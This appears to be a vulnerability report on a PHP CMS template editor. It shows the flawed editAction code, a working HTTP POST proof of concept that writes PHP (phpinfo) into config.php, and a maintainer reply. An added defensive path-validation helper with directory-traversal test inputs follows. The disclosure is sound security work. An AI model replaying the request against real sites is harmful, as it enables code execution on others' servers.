Vulnerability file: `core\controllers\admin\TemplateController.php`

```php
public function editAction() {
    $theme = $this->get('theme') ? urldecode($this->get('theme')) : '';
    if (!file_exists(THEME_PATH . DS . $theme)) {
        $this->show_message('该模板不存在!', 2, url('admin/template'));
    }
    // 'file' and 'dir' are taken from the request and joined into the path as-is.
    $filename = urldecode($this->get('file'));
    $dir = $this->get('dir') ? urldecode($this->get('dir')) : '/';
    $dir = str_replace(DS . DS, DS, $dir);
    $filepath = THEME_PATH . DS . $theme . $dir . $filename;
    $cur_path = DS . THEME_DIR. DS . $theme . $dir . $filename;
    // The only check is that the file exists; its extension is not restricted.
    if (!is_file($filepath)) {
        $this->show_message($cur_path . '该文件不存在!', 2, url('admin/template/item', array('dir' => $dir)));
    }
    if ($this->isPostForm()) {
        // The POSTed content is written to the file unchanged.
        file_put_contents($filepath, stripslashes($_POST['file_content']), LOCK_EX);
        $this->show_message('提交成功', 1);
    }
    if (urldecode(dirname($dir)) == '.') {
        $top_url = url('admin/template/item', array('theme' => $theme));
    } else {
        $top_url = url('admin/template/item', array('theme' => $theme, 'dir' => urldecode($dir . DS)));
    }
    $filecontent = htmlspecialchars(file_get_contents($filepath));
    include $this->views('admin/template/add');
}
```
Although the edit file page does not have an edit button for the PHP file, we can edit the `config.php` file by constructing a URL:

```
http://ip:port/index.php?s=admin&c=template&a=edit&theme=default&dir=/&file=config.php
```
POC
```http
POST /index.php?s=admin&c=template&a=edit&theme=default&dir=/&file=config.php HTTP/1.1
Host: ip:port
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:PHPSESSID=86s25d8kqaptrner2r2iqrqrv7;
Connection: close

file_content=<?php+phpinfo();?>&submit=%E6%8F%90%E4%BA%A4
```
@iami233 Thank you for your feedback. We will deal with this problem in the next version.
17b6005
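
A path-containment and extension allow-list check that an action like `editAction()` could run before reading or writing a template file, as an added example that is not the project's own code or its fix. The function name `resolve_editable_template`, the `EDITABLE_EXTENSIONS` list and the demo directory layout are assumptions.

```php
<?php
// Added example (hypothetical helper, not from the project).
// Assumption: only static template assets should be editable from the admin UI.
const EDITABLE_EXTENSIONS = ['html', 'htm', 'css', 'js'];

/** Return the canonical path of an editable template file, or null to reject. */
function resolve_editable_template(string $themeRoot, string $theme, string $dir, string $file): ?string
{
    $root = realpath($themeRoot);
    if ($root === false) {
        return null;
    }
    // The theme must be a direct child of the theme root (rejects '', '..', 'a/b').
    $themeDir = realpath($root . DIRECTORY_SEPARATOR . $theme);
    if ($themeDir === false || !is_dir($themeDir) || dirname($themeDir) !== $root) {
        return null;
    }
    // realpath() resolves '..', duplicate separators and symlinks; false if missing.
    $target = realpath($themeDir . DIRECTORY_SEPARATOR . $dir . DIRECTORY_SEPARATOR . $file);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Containment: the canonical path must still sit below the theme directory.
    $prefix = $themeDir . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Allow-list on the extension of the canonical file name.
    $ext = strtolower(pathinfo($target, PATHINFO_EXTENSION));
    return in_array($ext, EDITABLE_EXTENSIONS, true) ? $target : null;
}

// Constructed demo layout in a temporary directory.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . bin2hex(random_bytes(4));
mkdir("$base/themes/default", 0700, true);
file_put_contents("$base/themes/default/index.html", '<h1>demo</h1>');
file_put_contents("$base/themes/default/config.php", '<?php return [];');
file_put_contents("$base/outside.html", 'not part of any theme');

$requests = [                      // constructed theme/dir/file triples
    ['default', '/', 'index.html'],          // ordinary template
    ['default', '/', 'config.php'],          // the case from the report
    ['default', '/../../', 'outside.html'],  // leaves the theme directory
];
foreach ($requests as [$theme, $dir, $file]) {
    $path = resolve_editable_template("$base/themes", $theme, $dir, $file);
    printf("%-8s %-9s %-13s => %s\n", $theme, $dir, $file, $path ?? 'REJECTED');
}
```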